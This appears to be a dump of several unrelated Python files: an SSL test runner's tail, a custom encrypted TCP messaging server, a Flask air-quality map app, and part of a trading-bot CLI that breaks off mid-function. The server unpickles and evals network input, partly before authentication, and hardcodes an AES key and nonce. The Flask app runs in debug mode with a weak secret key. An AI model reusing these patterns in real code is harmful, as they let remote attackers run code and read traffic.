BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
server.py
|
import select
import socket
import queue
import threading
import sys
import pickle
import base64
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.serialization import load_ssh_public_key
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
import hashlib
import yaml
import random
class IPNC():
def __init__(self):
pass
def _read_yml(self,file = None):
with open(file) as file:
documents = yaml.full_load(file)
return documents
def _write_yml(self,file = None, dict_data = None,mode = "a+"):
with open(file, mode) as file:
yaml.dump(dict_data, file)
def _add_node(self,file = None, node = None):
try:
read = self._read_yml(file)
if read != None:
read[node[0]]
self._change_node_value(file,node)
else:
raise KeyError
except KeyError:
node_dict = {
node[0] : node[1]
}
self._write_yml(file, node_dict)
def _change_node_value(self,file = None, node = None):
r_yml = self._read_yml(file)
r_yml[node[0]] = node[1]
self._write_yml(file = file, dict_data = r_yml, mode = "w")
def _get_node(self,file = None, key = None, wait = True):
if key == None:
return self._read_yml(file)
if wait:
while True:
r_yml = self._read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
pass
except TypeError:
pass
else:
r_yml = self._read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
return None
except TypeError:
pass
def _remove_node(self,file,node):
try:
r_yml = self._read_yml(file = file)
r_yml[node]
r_yml.pop(node)
self._write_yml(file = file, dict_data = r_yml, mode = "w")
except KeyError:
return False
except:
pass
def _name_generator(self,_len_ = 16, onlyText = False):
lower_case = list("abcdefghijklmnopqrstuvwxyz")
upper_case = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
special = list("!@#$%&*?")
number = list("0123456789")
if onlyText:
_all_ = lower_case + upper_case
else:
_all_ = lower_case + upper_case + special + number
random.shuffle(_all_)
return "".join(random.sample(_all_,_len_))
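# For reference: _name_generator(8, onlyText=True) returns an 8-character random
# string built from letters only (e.g. something like 'QwErAsDf'; output varies
# per call), while the default draws 16 characters from letters, digits and the
# specials '!@#$%&*?'.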
class DSP():
def __init__(
self,
msg : str = None,
DSP_type : str = None,
device_id : int = None,
universalAesKey : bytes = None,
nonce : bytes = None,
aad : str = None,
):
self.msg = msg
self.DSP_type = DSP_type
self.device_id = device_id
if universalAesKey is not None:
self.UNIVERSAL_AES_KEY = universalAesKey
else:
self.UNIVERSAL_AES_KEY = b't\x89\xcc\x87\xcca\xe8\xfb\x06\xed\xcf+\x0eVB\xd2\xd3\xbeMk\xfa\xd1J\xa7\xc8@\xf8\x05\x0f\xfc\x18\x00'
if nonce is not None:
self.NONCE = nonce
else:
self.NONCE = b'\xfe\x1e1\xc0\xfc`s\xbc6\x9fQ\xb2'
if aad is not None:
self.AAD = aad
else:
self.AAD = b"au$tica&tedbut@u32nencr#cdscypteddatafdrj"
def _messanger(self,MSG = None):
if MSG is not None:
self.msg = MSG
data = f'DSP("{self.msg}","{self.DSP_type}")'
data = pickle.dumps(data)
pickled_data = data
encrypted_data = [self.device_id, self.__encrypt(pickled_data)]
p_e_d = pickle.dumps(encrypted_data)
ret = base64.b64encode(p_e_d)
return ret
def __repr__(self):
return "_main.DSP._"
def __encrypt(self,data):
aesgcm = AESGCM(self.UNIVERSAL_AES_KEY,)
ct = aesgcm.encrypt(
self.NONCE,
data,
self.AAD
)
return ct
def _convert_to_class(self,OBJECT : bytes = None,secure : bool = True, secure_dict : list = None):
try:
OBJECT = base64.b64decode(OBJECT)
OBJECT = pickle.loads(OBJECT)
if secure == True:
if secure_dict is None:
raise TypeError(
"_convert_to_class() missing 1 required positional argument: 'secure_dict'")
else:
secure_dict = pickle.loads(base64.b64decode(secure_dict))
aesgcm = AESGCM(secure_dict["aes_key"])
ct = aesgcm.decrypt(
secure_dict["nonce"], OBJECT[-1], secure_dict["aad"])
ct = pickle.loads(ct)
return eval(ct)
else:
aesgcm = AESGCM(self.UNIVERSAL_AES_KEY)
ct = aesgcm.decrypt(self.NONCE, OBJECT[-1], self.AAD)
ct = pickle.loads(ct)
return eval(ct)
except TypeError:
sys.exit()
except ValueError:
print("sender has not done the handshake")
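# Minimal round-trip sketch (assuming both sides keep the built-in universal
# key, nonce and AAD; 'device-1' is a hypothetical device id):
#
#     packet = DSP(msg="hello", DSP_type="DSP_MSG", device_id="device-1")._messanger()
#     restored = DSP()._convert_to_class(packet, secure=False)
#     restored.DSP_type   # -> 'DSP_MSG'
#
# With secure=True, _convert_to_class() instead expects the base64-encoded
# pickled dict of per-client 'aes_key', 'nonce' and 'aad' that the server
# issues during the username_secure handshake implemented below.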
class MAIN(IPNC):
def __init__(self,secure : bool = True,file = None):
"""Initialize the asynchronous, select-based multi-client TCP server core.
"""
IPNC.__init__(self)
self.__secure = secure
self.__file_location = file
self.READABLE = []
self.WRITABLE = []
self.INPUTS = []
self.OUTPUTS = []
self.MESSAGE_QUEUES = {}
self.REQUEST_LIST = []
self.REQUEST_RESPONSE_LIST = []
self.MESSAGE_LIST = []
self.__VARIFIED_DEVICES = []
self.__CLIENT_KEYS = {}
self.__CUSTOM_CHANNEL = []
self.__CUSTOM_CHANNEL_MSG_REC = []
self.__CUSTOM_CHANNEL_MSG_SEND = []
self.__VARIFIER_LIST = []
self.__CALLBACK_LOOP = []
self.__RECEIVING_MSG = []
get = self._get_node(file = self.__file_location,key = hashlib.sha256(bytes("key", "utf-8")).digest(), wait = False)
if get is not None:
self.__CLIENT_KEYS = get
self.__VARIFIED_DEVICES.extend(list(get.keys()))
def SERVER(self,address : str = None, port : int = None, listeners : int = None):
self.address = address
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
self.sock.setblocking(0)
self.sock.bind((self.address,self.port))
self.sock.listen(listeners)
print("[SERVER IS ACTIVATED | LISTENING]")
self.INPUTS.append(self.sock)
thread1 = threading.Thread(
target = self.receive_func,
args = (
self.__RECEIVING_MSG,
self.__VARIFIED_DEVICES,
self.__VARIFIER_LIST,
self.__CLIENT_KEYS,
self.OUTPUTS,
self.REQUEST_LIST,
self.REQUEST_RESPONSE_LIST,
self.MESSAGE_LIST,
self.__CUSTOM_CHANNEL_MSG_REC,
)
)
thread2 = threading.Thread(
target = self.send_func,
args = (
self.WRITABLE,
self.MESSAGE_QUEUES,
self.MESSAGE_LIST,
self.REQUEST_LIST,
self.REQUEST_RESPONSE_LIST,
self.__VARIFIER_LIST,
self.__CUSTOM_CHANNEL_MSG_SEND
)
)
thread3 = threading.Thread(
target = self.__callback_loop,
args = (
self.__CALLBACK_LOOP,
)
)
# thread1.daemon = True
thread1.start()
# thread2.daemon = True
thread2.start()
# thread3.daemon = True
thread3.start()
thread = threading.Thread(target = self.__server)
# thread.daemon = True
thread.start()
def __server(self):
data_recv_len = []
while True:
readable, writable, exceptions = select.select(self.INPUTS, self.OUTPUTS, self.INPUTS)
# handling the inputs
for r in readable:
if r is self.sock:
connection,addr = r.accept()
connection.setblocking(0)
self.INPUTS.append(connection)
self.MESSAGE_QUEUES[connection] = queue.Queue()
else:
ini = list(zip(*data_recv_len))
if len(ini) == 0 or r not in ini[0]:
try:
data_len = pickle.loads(base64.b64decode(r.recv(32).decode().strip("0").encode("utf-8")))
except ConnectionResetError:
print("Client Disconnected")
if r in self.OUTPUTS:
self.OUTPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
self.INPUTS.remove(r)
r.close()
del self.MESSAGE_QUEUES[r]
continue
except Exception as e:
pass
if data_len:
if type(data_len) == type([]):
data_recv_len.append(
[
r,
data_len[0]
]
)
else:
print("User Disconnected")
if r in self.OUTPUTS:
self.OUTPUTS.remove(r)
self.INPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
r.close()
del self.MESSAGE_QUEUES[r]
continue
else:
qwe = list(zip(*data_recv_len))
INDEX = qwe[0].index(r)
try:
recv_len = data_recv_len.pop(INDEX)[1]
data = r.recv(recv_len)
try:
data = data.decode().strip("0").encode("utf-8")
except:
print("Error in decoding")
self.__RECEIVING_MSG.append(data)
self.MESSAGE_QUEUES[r].put(pickle.loads(base64.b64decode(data))[0])
if r not in self.OUTPUTS:
self.OUTPUTS.append(r)
except Exception as e:
print("User Disconnected")
readable.remove(r)
self.INPUTS.remove(r)
writable.remove(r)
self.OUTPUTS.remove(r)
if r in self.WRITABLE:
self.WRITABLE.remove(r)
del self.MESSAGE_QUEUES[r]
continue
# handling the outputs
for w in writable:
if w not in self.WRITABLE:
self.WRITABLE.append(w)
# handling the errors
for e in exceptions:
self.INPUTS.remove(e)
if e in self.OUTPUTS:
self.OUTPUTS.remove(e)
e.close()
del self.MESSAGE_QUEUES[e]
def receive_func(self, __receiving_msg,__varified_devices, __varifier_lst, __client_keys, __outputs, __request_lst, __request_res_lst, __message_lst, __custom_c_m_r):
# __receiving_msg = self.__RECEIVING_MSG,
# __varified_devices = self.__VARIFIED_DEVICES,
# __varifier_lst = self.__VARIFIER_LIST,
# __client_keys = self.__CLIENT_KEYS,
# __outputs = self.OUTPUTS,
# __request_lst = self.REQUEST_LIST
# __request_res_lst = self.REQUEST_RESPONSE_LIST
# __message_lst = self.MESSAGE_LIS
# __custom_c_m_r = self.__CUSTOM_CHANNEL_MSG_REC
while True:
try:
for INDEX,_data_ in enumerate(__receiving_msg):
data = pickle.loads(base64.b64decode(_data_))
if data[0] not in __varified_devices:
_recv_ = DSP()._convert_to_class(_data_, secure = False)
if _recv_.DSP_type == "username_secure":
resolved_data = eval(_recv_.msg)
aes_key = AESGCM.generate_key(256)
nonce = os.urandom(32)
aad = bytes(self._name_generator(),"utf-8")
qw = {
"aes_key" : aes_key,
"nonce" : nonce,
"aad" : aad,
}
pickle_qw = pickle.dumps(qw)
b64_aes_key_pack = base64.b64encode(pickle_qw)
key = load_ssh_public_key(
bytes(
resolved_data["data"],
"utf-8"
),
backend=default_backend()
)
ciphertext = key.encrypt(
b64_aes_key_pack,
padding.OAEP(
mgf = padding.MGF1(algorithm = hashes.SHA256()),
algorithm = hashes.SHA256(),
label = None
)
)
ciphertext = base64.b64encode(ciphertext)
prepare_data = {"key" : ciphertext}
dsp_data = DSP(
DSP_type="username_secure_response"
)._messanger(
MSG = prepare_data
)
dsp_data = [resolved_data["username"],dsp_data]
__varifier_lst.append(dsp_data)
__varified_devices.append(resolved_data["username"])
__client_keys[resolved_data["username"]] = b64_aes_key_pack
get = self._get_node(
file = self.__file_location,
key = hashlib.sha256(bytes("key","utf-8")).digest(),
wait = False
)
if get is not None:
get[resolved_data["username"]] = b64_aes_key_pack
self._add_node(
file = self.__file_location,
node = [
hashlib.sha256(bytes("key","utf-8")).digest(),
get
]
)
else:
self._add_node(
file = self.__file_location,
node = [
hashlib.sha256(bytes("key","utf-8")).digest(),
{
resolved_data["username"] : b64_aes_key_pack
}
]
)
__receiving_msg.pop(INDEX)
else:
aes_key_pack = __client_keys[data[0]]
_recv_ = DSP()._convert_to_class(
OBJECT = _data_,
secure = True,
secure_dict = aes_key_pack
)
if _recv_.DSP_type == "DSP_REQ":
try:
resolved_data = eval(_recv_.msg)
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__request_lst.append(
[
resolved_data["target_name"],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type == "DSP_REQ_RES":
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__request_res_lst.append(
[
resolved_data["target_name"],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type == "DSP_MSG":
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__message_lst.append(
[
resolved_data['target_name'],
_recv_.msg
]
)
__receiving_msg.remove(_data_)
except:
pass
elif _recv_.DSP_type in self.__CUSTOM_CHANNEL:
try:
resolved_data = pickle.loads(base64.b64decode(eval(_recv_.msg)))
__custom_c_m_r.append(resolved_data)
__receiving_msg.remove(_data_)
except:
pass
except:
pass
def send_func(self,Writable,message_q,message_list,requestList,requestResList,varifierList,customChannelMessageSend):
while True:
for s in Writable:
if s._closed and s.fileno() == -1:
Writable.remove(s)
continue
# try:
try:
username = message_q[s].get_nowait()
message_q[s].put(username)
msg_lst = list(zip(*message_list))
req_lst = list(zip(*requestList))
req_res_lst = list(zip(*requestResList))
vari_lst = list(zip(*varifierList))
send_c_msg = list(zip(*customChannelMessageSend))
except (KeyError, queue.Empty):
# nothing queued for this socket (or it is unknown); skip it this pass
continue
if len(msg_lst) > 0:
if username in msg_lst[0]:
INDEX = msg_lst[0].index(username)
aes_key_pack = self.__CLIENT_KEYS[username]
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_MSG",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{msg_lst[1][INDEX]}"
).decode().center(len(msg_lst[1][INDEX]) + 100, "|").encode("utf-8")
try:
s.send(bytes(f"{len(dsp_data)}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
message_list.pop(INDEX)
except OSError:
pass
if len(req_lst) > 0:
if username in req_lst[0]:
INDEX = req_lst[0].index(username)
try:
aes_key_pack = self.__CLIENT_KEYS[username]
except KeyError:
continue
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_handshake_request",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{req_lst[1][INDEX]}"
).decode().center(len(req_lst[1][INDEX]) + 100, "|").encode("utf-8")
s.send(bytes(f"{len(dsp_data)+100}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
requestList.pop(INDEX)
if len(req_res_lst) > 0:
if username in req_res_lst[0]:
INDEX = req_res_lst[0].index(username)
aes_key_pack = self.__CLIENT_KEYS[username]
aes_key_pack = pickle.loads(base64.b64decode(aes_key_pack))
dsp_data = DSP(
DSP_type = "DSP_handshake_request_res",
universalAesKey = aes_key_pack["aes_key"],
nonce = aes_key_pack["nonce"],
aad = aes_key_pack["aad"]
)._messanger(
MSG = f"{req_res_lst[1][INDEX]}"
).decode().center(len(req_res_lst[1][INDEX]) + 100, "|").encode("utf-8")
s.send(bytes(f"{len(dsp_data)+100}".center(16,"|"),"utf-8"))
s.send(
dsp_data
)
requestResList.pop(INDEX)
if len(vari_lst) > 0:
if username in vari_lst[0]:
INDEX = vari_lst[0].index(username)
s.send(bytes(f"{len(vari_lst[1][INDEX])}".center(16,"|"),"utf-8"))
s.send(
vari_lst[1][INDEX]
)
varifierList.pop(INDEX)
if len(send_c_msg) > 0:
if username in send_c_msg[0]:
INDEX = send_c_msg[0].index(username)
s.send(bytes(f"{len(send_c_msg[1][INDEX])}".center(16,"|"),"utf-8"))
s.send(send_c_msg[1][INDEX])
customChannelMessageSend.pop(INDEX)
# except:
# pass
def CREATE_CHANNEL(self,channel_name = None, multiple : bool = False):
if multiple:
if type(channel_name) == type([]):
for channel in channel_name:
if channel not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channel)
else:
print(f"Channel : {channel} already exists.")
else:
raise TypeError("When 'multiple' is set to True, channel_name should be a list of channel names")
else:
if channel_name not in self.__CUSTOM_CHANNEL:
self.__CUSTOM_CHANNEL.append(channel_name)
def LISTEN(self,channel : str = None,function : object = None,args = None):
if channel is not None:
found = False
index = None
if channel in self.__CUSTOM_CHANNEL:
for i,d in enumerate(self.__CUSTOM_CHANNEL_MSG_REC):
if d["channel"] == channel:
found = True
index = i
break
if found:
if args is None:
p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
self.__CALLBACK_LOOP.append([function,[p_data]])
else:
p_data = self.__CUSTOM_CHANNEL_MSG_REC.pop(index)
args = list(args)
args.insert(0,p_data)
self.__CALLBACK_LOOP.append([function,args])
else:
raise TypeError("'channel' should not be None")
def __callback_loop(self,__callback_loop):
while True:
# drain pending callbacks without mutating the list while iterating over it
while __callback_loop:
func = __callback_loop.pop(0)
func[0](*func[1])
def SEND(self,channel_name,target_name,data):
if channel_name in self.__CUSTOM_CHANNEL:
key_pack = self.__CLIENT_KEYS[target_name]
key_pack = pickle.loads(base64.b64decode(key_pack))
dsp_data = DSP(
DSP_type = channel_name,
universalAesKey=key_pack["aes_key"],
nonce = key_pack["nonce"],
aad= key_pack["aad"]
)._messanger(
MSG = base64.b64encode(pickle.dumps(data))
)
self.__CUSTOM_CHANNEL_MSG_SEND.append(
[
target_name,
dsp_data
]
)
class server():
def __init__(self, secure : bool = True, file : str = None):
"""
This class allows the user to create a multi-client server.
args:
secure : bool = True -> should be left at its default value True,
file : str = None -> path to a YAML file in which all keys and configuration are stored.
If not specified, a TypeError is raised.
"""
if not file:
raise TypeError("server() missing 1 required positional argument: 'file'")
__parent = MAIN(secure = secure, file = file)
self.SERVER = __parent.SERVER
self.CREATE_CHANNEL = __parent.CREATE_CHANNEL
self.LISTEN = __parent.LISTEN
self.SEND = __parent.SEND
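# Minimal usage sketch (hypothetical host, port and channel names; the YAML file
# is created on first use and stores the per-client key packs). The target of
# SEND must already have completed the key handshake with the server:
#
#     srv = server(file="keys.yml")
#     srv.CREATE_CHANNEL("telemetry")
#     srv.SERVER(address="0.0.0.0", port=9000, listeners=5)
#     srv.LISTEN("telemetry", function=print)            # poll for received data
#     srv.SEND("telemetry", "client-username", {"x": 1})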
|
Main.py
|
import RethinkDB_Queries as r
import CSV_Download as d
import CSV_Read as csv
import json
from math import cos, asin, sqrt, pi
import rethinkdb as rdb
from flask import Flask, g, render_template, make_response, request, redirect, url_for, jsonify
from flask_socketio import SocketIO, send, emit
from threading import Thread
from rethinkdb import RqlRuntimeError, RqlDriverError
app = Flask(__name__)
socketio = SocketIO(app)
global thread
thread = None
# Load default config and override config from an environment variable
app.config.update(dict(
DEBUG=True,
SECRET_KEY='secret!',
DB_HOST='localhost',
DB_PORT=28015,
DB_NAME='AirQuality'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def db_work():
# Connect to the database
connection = r.connect_db("localhost", 28015)
# File names
filename_data = 'data.csv'
filename_magnitudes = 'mag.csv'
filename_estaciones = 'stations.csv'
# Database and table names
db_name = 'AirQuality'
table_data = 'datos'
table_mag = 'magnitudes'
table_sta = 'estaciones'
# Download the data file
d.download_file("http://datos.madrid.es/egob/catalogo/212531-10515086-calidad-aire-tiempo-real.csv", filename_data)
# Parse the data file into 'data', the magnitudes into 'magnitudes' and the stations into 'estaciones'
data = csv.read_file_data(filename_data)
magnitudes = csv.read_file_magnitudes(filename_magnitudes)
estaciones = csv.read_file_estaciones(filename_estaciones)
# Once parsed, delete the downloaded file
d.drop_file(filename_data)
# If the database already exists, drop it
if r.exist_db(connection, db_name):
r.drop_db(connection, db_name)
# Create the AirQuality database, which will contain the tables with
# the measurements, the stations and the magnitudes
r.create_db(connection, db_name)
r.create_table(connection, db_name, table_data)
r.create_table(connection, db_name, table_sta)
r.create_table(connection, db_name, table_mag)
# Insert the data obtained from the downloaded CSV
r.insert_data(connection, db_name, table_data, data)
r.insert_data(connection, db_name, table_mag, magnitudes)
r.insert_data(connection, db_name, table_sta, estaciones)
# Show the data from the DB
# r.retrieve_data(connection, db_name, table_data)
# r.retrieve_data(connection, db_name, table_mag)
# r.retrieve_data(connection, db_name, table_sta)
# Create a geospatial index
r.create_geospatial_index(connection, db_name, table_sta, 'coordenadas')
r.wait_index(connection, db_name, table_sta, 'coordenadas')
# Query the nearest point
# r.nearest_points(connection, db_name, table_sta, 'coordenadas', 40.465156, -3.584270)
# Close the connection
r.close_db(connection)
@app.before_request
def before_request():
g.db_conn = rdb.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
@app.teardown_request
def teardown_request(exception):
try:
g.db_conn.close()
except AttributeError:
pass
@app.route('/', methods=['GET'])
def show_info():
estaciones = rdb.db(app.config['DB_NAME']).table('estaciones').run(g.db_conn)
# for estacion in estaciones:
# print(estacion['coordenadas']['coordinates'])
magnitudes = None
estaciones_array = []
for estacion in estaciones:
datos_estacion = rdb.db('AirQuality').table('datos').eq_join("ESTACION",
rdb.db("AirQuality").table(
"estaciones")).zip().filter(
{"ESTACION": estacion['id']}).eq_join("MAGNITUD", rdb.db("AirQuality").table('magnitudes')).zip().run(
g.db_conn)
estacion['datos'] = []
for dato_estacion in datos_estacion:
estacion['datos'].append(dato_estacion)
# print(estacion)
estaciones_array.append(estacion)
datos = list(
rdb.db('AirQuality').table('datos').run(g.db_conn, time_format="raw"))
# print(datos)
return render_template('index.html', datos=datos, estaciones=estaciones_array, magnitudes=magnitudes)
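# distance() below is the haversine great-circle distance in kilometres:
# p = pi/180 converts degrees to radians and 12742 is the Earth's mean
# diameter in km (2 * 6371).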
def distance(lat1, lon1, lat2, lon2):
p = 0.017453292519943295
a = 0.5 - cos((lat2 - lat1) * p) / 2 + cos(lat1 * p) * cos(lat2 * p) * (1 - cos((lon2 - lon1) * p)) / 2
return 12742 * asin(sqrt(a))
@app.route('/distancia/', methods=['POST'])
def recalcular_distancias():
data = json.loads(request.data)
longitud = data['longitud']
latitud = data['latitud']
# print(longitud)
# print(latitud)
estaciones = rdb.db(app.config['DB_NAME']).table('estaciones').run(g.db_conn)
# for estacion in estaciones:
# print(estacion['coordenadas']['coordinates'])
magnitudes = None
estaciones_array = []
for estacion in estaciones:
# print(estacion['latitud'])
# print(estacion['longitud'])
datos_estacion = rdb.db('AirQuality').table('datos').eq_join("ESTACION",
rdb.db("AirQuality").table(
"estaciones")).zip().filter(
{"ESTACION": estacion['id']}).eq_join("MAGNITUD", rdb.db("AirQuality").table('magnitudes')).zip().run(
g.db_conn)
estacion['datos'] = []
for dato_estacion in datos_estacion:
estacion['datos'].append(dato_estacion)
estacion['distancia'] = distance(float(latitud), float(longitud), float(estacion['latitud']),
float(estacion['longitud']))
# print(estacion)
estaciones_array.append(estacion)
datos = list(
rdb.db('AirQuality').table('datos').run(g.db_conn, time_format="raw"))
estaciones_array = sorted(estaciones_array, key=lambda estacion: estacion['distancia'])
print(estaciones_array)
# print(datos)
# return render_template('index.html', datos=datos, estaciones=estaciones_array, magnitudes=magnitudes)
socketio.emit('reset')
for i, estacion in enumerate(estaciones_array):
if i > 4:
break
print(estacion)
socketio.emit('distancia', estacion)
return make_response('OK', 201)
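# Example request (sketch, assuming the default port 8083 configured below):
#
#   curl -X POST http://localhost:8083/distancia/ \
#        -H 'Content-Type: application/json' \
#        -d '{"latitud": 40.4168, "longitud": -3.7038}'
#
# The handler recomputes the distance from that point to every station and
# pushes the five nearest stations to the browser via the 'distancia' event.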
def cambios_datos():
conn = rdb.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
feed = rdb.table("datos").changes().run(conn)
# notify connected clients whenever the RethinkDB changefeed reports a change
for _change in feed:
socketio.emit('nuevo_dato')
if __name__ == '__main__':
db_work()
if thread is None:
thread = Thread(target=cambios_datos)
thread.start()
socketio.run(app, host='0.0.0.0', port=8083)
|
cli.py
|
#!/usr/bin/env python3
# coding: utf-8
# @Author: ArthurBernard
# @Email: arthur.bernard.92@gmail.com
# @Date: 2020-03-17 12:23:25
# @Last modified by: ArthurBernard
# @Last modified time: 2020-08-21 11:07:53
""" A (very) light Command Line Interface. """
# Built-in packages
import logging
import select
import sys
from threading import Thread
import time
# Third party packages
from blessed import Terminal
import fynance as fy
import numpy as np
import pandas as pd
# Local packages
from trading_bot._client import _ClientCLI
from trading_bot.data_requests import get_close
from trading_bot.tools.io import load_config_params, get_df
def _set_text(*args):
""" Set a table. """
n = max(len(arg) for arg in args)
k_list = ['| ' if len(arg[0]) > 1 else '+' for arg in args]
for i in range(n):
i_args, n_spa, j = [], 0, 0
for arg in args:
if len(arg) >= i + 1:
i_args += [arg]
n_spa = max(n_spa, len(str(arg[i])))
for arg in args:
if len(arg[0]) > 1 and len(arg) >= i + 1:
space = ' ' * (n_spa - len(str(arg[i])))
k_list[j] += str(arg[i]) + space + ' |'
if i < n - 1:
k_list[j] += ' '
elif len(arg[0]) == 1 and len(arg) >= i + 1:
k_list[j] += arg[i] * (n_spa + 2) + '+'
else:
if i % 2 == 0:
k_list[j] = k_list[j][:-2] + ' ' * (n_spa + 3) + '|'
else:
k_list[j] = '|' + ' ' * (n_spa + 3) + k_list[j][1:-1]
if i < n - 1:
k_list[j] += ' '
j += 1
return '\n'.join(k_list)
def _zip_text(txt1, txt2, c=' '):
txt1 = txt1.split('\n')
txt2 = txt2.split('\n')
if len(txt1) < len(txt2):
txt1, txt2 = txt2, txt1
n = len(txt2)
txt = list(a + c + b for a, b in zip(txt1[:n], txt2))
txt += txt1[n:]
return '\n'.join(txt)
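# e.g. _zip_text('a\nb', '1\n2') returns 'a 1\nb 2'; lines of the longer text
# without a counterpart are appended unchanged.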
def _rounder(*args, dec=0):
""" Round each element of a list. """
# return [round(float(arg), dec) for arg in args]
return [round(float(a), dec) if abs(float(a)) < 10e3 else format(a, "5.1e") for a in args]
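# e.g. _rounder(3.14159, -2.71828, dec=2) -> [3.14, -2.72]; values whose
# absolute value is 10e3 or more are rendered in scientific notation instead.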
class _ResultManager: # (ResultManager):
""" Manager object for the historical results of strategies.
Attributes
----------
df : pandas.DataFrame
Data with each series to compute performances.
period : int
Maximal number of trading periods per year
metrics : list of str
List of metrics to compute performance. The following are available:
'return', 'perf', 'sharpe', 'calmar', and 'maxdd'.
periods : list of str
Frequency to compute performances. The following are available:
'daily', 'weekly', 'monthly', 'yearly' and 'total'.
Methods
-------
print_stats
set_current_price
set_current_value
set_current_stats
"""
min_freq = None
min_TS = None
max_TS = None
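# A pnl_dict entry, as inferred from the attribute accesses below, looks
# roughly like (pair name and frequency are illustrative):
#   {'my_strat': {'pnl': <pd.DataFrame with 'value', 'fee', 'slippage', ...>,
#                 'pair': 'XBTEUR', 'freq': 3600, 'vali': False}}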
def __init__(self, pnl_dict, period=252): # , metrics=[], periods=[]):
""" Initialize object.
Parameters
----------
pnl_dict : dict of pd.DataFrame
Objects used to compute and store the profit and loss of a trading bot.
metrics : list of str
List of metrics used to display results. Available metrics are 'return',
'perf', 'sharpe', 'calmar' and 'maxdd'.
periods : list of str
List of periods over which to compute the metrics. Available periods are
'daily', 'weekly', 'monthly', 'yearly' and 'total'.
period : int, optional
Number of trading days per year, i.e. 252 when trading on classical
markets and 364 for crypto-currency markets. Default is 252.
"""
self.pnl = pnl_dict
self.strat_by_pair = {}
for key, value in pnl_dict.items():
idx = value['pnl'].index
if self.max_TS is None or idx[-1] > self.max_TS:
self.max_TS = idx[-1]
self._set_ref_pair(key, value['pair'], value['freq'], idx.min())
ts = (idx[1:] - idx[:-1]).min()
self.pnl[key]['period'] = period * 86400 / ts
index = range(self.min_TS, self.max_TS + 1, self.min_freq)
columns = ['value', 'slippage', 'fee']
self.tot_val = pd.DataFrame(0, index=index, columns=columns)
for k, v in pnl_dict.items():
df = pd.DataFrame(index=index, columns=columns)
idx = v['pnl'].index
if v['vali']:
v['pnl'].loc[:, 'slippage'] = 0.
df.loc[idx, 'value'] = v['pnl'].value.values
df.loc[idx, 'fee'] = v['pnl'].fee.values
df.loc[idx, 'slippage'] = v['pnl'].slippage.values
df.loc[:, 'slippage'] = df.loc[:, 'slippage'].fillna(value=0.)
df.loc[:, 'fee'] = df.loc[:, 'fee'].fillna(value=0.)
df = df.fillna(method='ffill').fillna(method='bfill')
self.tot_val.loc[:, 'value'] += df.value.values
self.tot_val.loc[:, 'slippage'] += df.slippage.values
self.tot_val.loc[:, 'fee'] += df.fee.values
self.metrics = ['return', 'perf', 'sharpe', 'calmar', 'maxdd']
self.periods = ['daily', 'weekly', 'monthly', 'yearly', 'total']
self.logger = logging.getLogger(__name__)
def get_current_stats(self):
""" Display some statistics for some time periods. """
txt_table = [['-'] * (1 + len(self.metrics) + 2),
[' '] + self.metrics + ['slippage', 'cumFees']]
self._update_pnl()
for period in self.periods:
txt_table += [['-'] * (1 + len(self.metrics) + 2), [period]]
# for key, value in self.pnl.items():
for pair, strats_dict in self.strat_by_pair.items():
strat_ref = self.pnl[strats_dict['ref']]
df = strat_ref['pnl']
txt_table += self.set_stats_result(
df, period, strat_ref['period'], col={'price': '- ' + pair}
)
for key in strats_dict['strat']:
value = self.pnl[key]
df = value['pnl']
txt_table += self.set_stats_result(
df,
period,
value['period'],
col={'value': key}
)
txt_table += self.set_stats_result(
self.tot_val, period, 365, col={'value': 'total'}
)
txt_table += (['-'] * (1 + len(self.metrics) + 2),)
return txt_table
def set_stats_result(self, df, head, period, col):
_index = self._get_period_index(df, head)
if _index is None:
return ''
return self._set_stats_result(df.loc[_index], head, period, col=col)
def _set_stats_result(self, df, head, period, col=None):
""" Set statistics in a table with header. """
# table = [['-'] * (1 + len(self.metrics)), [head]]
table = []
if col is None:
col = {'price': 'underlying', 'value': 'strategy'}
for k, a in col.items():
table += [[str(a)] + self.set_statistics(df.loc[:, k].values,
period)]
# Append slippage and fees
if k == 'price':
table[-1] += [' ', ' ']
elif k == 'value':
slippage = np.sum(df.loc[:, 'slippage'].values)
cum_fees = np.sum(df.loc[:, 'fee'].values)
